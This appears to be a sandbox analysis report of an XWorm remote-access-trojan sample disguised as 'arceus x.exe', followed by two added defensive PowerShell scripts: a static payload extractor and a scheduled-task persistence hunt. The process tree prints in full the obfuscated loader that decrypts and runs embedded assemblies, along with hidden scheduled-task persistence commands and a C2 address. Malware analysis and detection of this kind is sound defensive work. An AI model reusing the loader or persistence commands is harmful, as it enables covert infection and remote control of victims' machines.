Analysis

  • max time kernel
    48s
  • max time network
    48s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags
    arch:x64
    arch:x86
    image:win11-20240508-en
    locale:en-us
    os:windows11-21h2-x64
    system
  • submitted
    28/06/2024, 11:22

General

  • Target

    arceus x.exe

  • Size

    10.3MB

  • MD5

    380f08da7396daa261f7edabdc161388

  • SHA1

    3622717512e77bb2ea51c9af995fa1c359413d8f

  • SHA256

    2f5ed04a9e2907c09ab4a3d6a984b68976926d2d99f21239bfbe8625b415ccc3

  • SHA512

    f724db6274890b9472067437f69a4d0d01bc4d911a32515d52c502d8524a31c1563641fed55d2021e9853bb2c1618aec24ac23c9f074b7331be4032917598424

  • SSDEEP

    196608:p6iDnLZQi21bRqt9Vs9sMm2agR2wCg6N6FYx1jg+elKIK0G8V1f83:plDLvgbRWs93dW9AFYH8kd0Ge83

Malware Config

Extracted

Family

xworm

Version

5.0

C2

amount-socket.gl.at.ply.gg:29643

Mutex

CBOJbsqFCwukBOQm

Attributes
  • install_file

    USB.exe

  • aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell with its console window hidden (-w hidden).

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\arceus x.exe
    "C:\Users\Admin\AppData\Local\Temp\arceus x.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat"
          4⤵
            PID:3556
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:3748
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_822_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1792
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_822.vbs"
                  6⤵
                    PID:2284
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat" "
                      7⤵
                        PID:3128
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ps91keyBb4lnjxdob6tzQba6BACBibl2zBpvZvFNOWc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtrhqYbWWFfSPQvQb3d91A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRZba=New-Object System.IO.MemoryStream(,$param_var); $jsNQu=New-Object System.IO.MemoryStream; $CLwrs=New-Object System.IO.Compression.GZipStream($NRZba, [IO.Compression.CompressionMode]::Decompress); $CLwrs.CopyTo($jsNQu); $CLwrs.Dispose(); $NRZba.Dispose(); $jsNQu.Dispose(); $jsNQu.ToArray();}function execute_function($param_var,$param2_var){ $GwDBq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MpdiL=$GwDBq.EntryPoint; $MpdiL.Invoke($null, $param2_var);}$MoyRz = 'C:\Users\Admin\AppData\Roaming\Windows_Log_822.bat';$host.UI.RawUI.WindowTitle = $MoyRz;$AwuKC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MoyRz).Split([Environment]::NewLine);foreach ($Eiwrz in $AwuKC) { if ($Eiwrz.StartsWith('OxmjDjVQGELoVrtODSIh')) { $PkJsN=$Eiwrz.Substring(20); break; }}$payloads_var=[string[]]$PkJsN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                          8⤵
                            PID:3852
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2832
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1692
                              9⤵
                              • Program crash
                              PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4364
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3444
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                      5⤵
                        PID:1216
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1624
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2100
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=fboNTcjJ8bo
                        5⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:1188
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda9c33cb8,0x7ffda9c33cc8,0x7ffda9c33cd8
                          6⤵
                            PID:1884
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2
                            6⤵
                              PID:5048
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
                              6⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:864
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
                              6⤵
                                PID:788
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                6⤵
                                  PID:1600
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
                                  6⤵
                                    PID:3060
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
                                    6⤵
                                      PID:72
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                                      6⤵
                                        PID:1836
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:8
                                        6⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2640
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:8
                                        6⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1776
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,5357681811332853446,9800252216511254812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                                        6⤵
                                          PID:1160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat""
                                    3⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat"
                                      4⤵
                                        PID:3836
                                        • C:\Windows\SysWOW64\cmd.exe
                                           C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                          5⤵
                                            PID:3656
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4128
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_172_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                              6⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4656
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_172.vbs"
                                              6⤵
                                                PID:2080
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat" "
                                                  7⤵
                                                    PID:1652
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                       C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                      8⤵
                                                        PID:3240
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3148
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:5012
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1028
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2832 -ip 2832
    1⤵
    PID:1780
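
The cmd.exe /S /D /c" echo function decrypt_function ... " lines in the tree above are the whole loader: the batch file carries a 20-character marker line whose remainder is two blobs separated by '\', each one Base64 with '/' and 'A' swapped for '#' and '@', AES-CBC/PKCS7 encrypted under a Base64 key and IV that sit in the clear, then GZip-compressed, and finally passed to Assembly.Load. The script below is an added example, not code from the tria.ge report or from the sample: it is a static extractor that reverses that chain and writes the embedded assemblies to disk without loading them. It assumes $BatPath is a local copy of one of the .bat files (skuld.bat, xworm.bat or the Windows_Log_*.bat copies) and that the loader text appears in the file as it does in the captured command line, so no batch escaping has to be stripped first; $OutDir and the payloadN.bin names are the example's own choices.

```powershell
<#
 Static extractor for the batch-embedded PowerShell loader seen in the process tree.
 Added example, not part of the report or the sample. It never calls Assembly.Load;
 it only undoes marker -> '#'/'@' substitution -> Base64 -> AES-CBC/PKCS7 -> GZip.
 Assumption: the loader text is present in the .bat exactly as in the command line.
#>
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path (Get-Location) 'extracted')
)
$ErrorActionPreference = 'Stop'
$text = [System.IO.File]::ReadAllText($BatPath)

# 1. Key and IV: FromBase64String is hidden behind a reversed string, but the
#    Base64 literals are in the clear and appear in assignment order (Key, then IV).
$b64 = [regex]::Matches($text, "\('gnirtS46esaBmorF'\[-1\.\.-16\] -join ''\)\('([A-Za-z0-9+/=]+)'\)")
if ($b64.Count -lt 2) { throw 'Loader key/IV pattern not found in this file' }
[byte[]]$key = [Convert]::FromBase64String($b64[0].Groups[1].Value)
[byte[]]$iv  = [Convert]::FromBase64String($b64[1].Groups[1].Value)

# 2. Marker: the 20-character prefix the loader tests with StartsWith().
$marker = [regex]::Match($text, "StartsWith\('([A-Za-z0-9]{20})'\)").Groups[1].Value
if (-not $marker) { throw 'Marker prefix not found' }

# 3. Payload line: marker followed by the two blobs joined with '\'.
$line = ($text -split "`r?`n") | Where-Object { $_.StartsWith($marker) } | Select-Object -First 1
if (-not $line) { throw "No line starts with marker $marker" }
$blobs = $line.Substring($marker.Length).Split('\')

function Decode-Blob([string]$b64Blob) {
    # Undo the loader's alphabet swap, then Base64 -> AES-CBC/PKCS7 -> GZip.
    $cipher = [Convert]::FromBase64String($b64Blob.Replace('#', '/').Replace('@', 'A'))
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $key
    $aes.IV  = $iv
    $dec   = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
    $dec.Dispose(); $aes.Dispose()
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

# 4. Write each stage out as .bin (never .exe) and report an MZ check plus SHA256.
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
for ($i = 0; $i -lt $blobs.Count; $i++) {
    [byte[]]$payload = Decode-Blob $blobs[$i]
    $isPE = ($payload.Length -gt 2) -and ($payload[0] -eq 0x4D) -and ($payload[1] -eq 0x5A)
    $dest = Join-Path $OutDir ("payload{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($dest, $payload)
    $sha  = (Get-FileHash -Algorithm SHA256 -Path $dest).Hash
    "{0}: {1} bytes, MZ={2}, SHA256={3}" -f $dest, $payload.Length, $isPE, $sha
}
```

Run it as .\Extract-BatLoader.ps1 -BatPath .\xworm.bat on an isolated analysis box. For this sample the first blob is the helper assembly invoked with a null argument and the second is the one invoked with an empty string array, so payload1.bin is where the XWorm configuration (C2, mutex, install_file) should be recoverable; write-protecting the output directory or dropping the .bin files straight into a .NET decompiler avoids ever executing them.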

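Persistence in this run is a scheduled task registered from PowerShell (Windows_Log_822_str and Windows_Log_172_str) that launches a .vbs from AppData\Roaming at logon, hidden, with -RunLevel Highest. The hunt below is an added example, not from the report: it walks every scheduled task on the host and flags actions that run a script host or a script file from a user-writable path, combined with the hidden, highest-run-level and logon-trigger settings the sample used. The flag names, the two-flag threshold and the path and extension lists are the example's own choices; run it elevated on the host under investigation.

```powershell
# Added example: hunt scheduled tasks for the persistence pattern seen in this report.
# Scores each exec action on several cheap indicators and prints tasks with two or more.
$scriptHosts = 'wscript.exe', 'cscript.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe'
$scriptExt   = '\.(vbs|vbe|js|jse|bat|cmd|ps1|hta|wsf)$'
$userPaths   = '\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\|%APPDATA%|%TEMP%|%LOCALAPPDATA%'

Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }              # COM-handler actions have no Execute
        $exe     = $action.Execute.Trim('"')
        $exeName = ($exe -split '[\\/]')[-1].ToLower()      # file name without touching Path APIs
        $cmd     = "$exe $($action.Arguments)"
        $hits    = @()
        if ($scriptHosts -contains $exeName)        { $hits += 'script-host' }
        if ($exe -match $scriptExt)                 { $hits += 'script-as-executable' }   # e.g. a .vbs as the action
        if ($cmd -match $userPaths)                 { $hits += 'user-writable-path' }
        if ($task.Principal.RunLevel -eq 'Highest') { $hits += 'runlevel-highest' }
        if ($task.Settings.Hidden)                  { $hits += 'hidden' }
        if ($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }) {
            $hits += 'at-logon'
        }
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                TaskName  = $task.TaskName
                TaskPath  = $task.TaskPath
                Principal = $task.Principal.UserId
                Command   = $cmd
                Flags     = $hits -join ','
            }
        }
    }
} | Sort-Object Flags -Descending | Format-Table -AutoSize -Wrap
```

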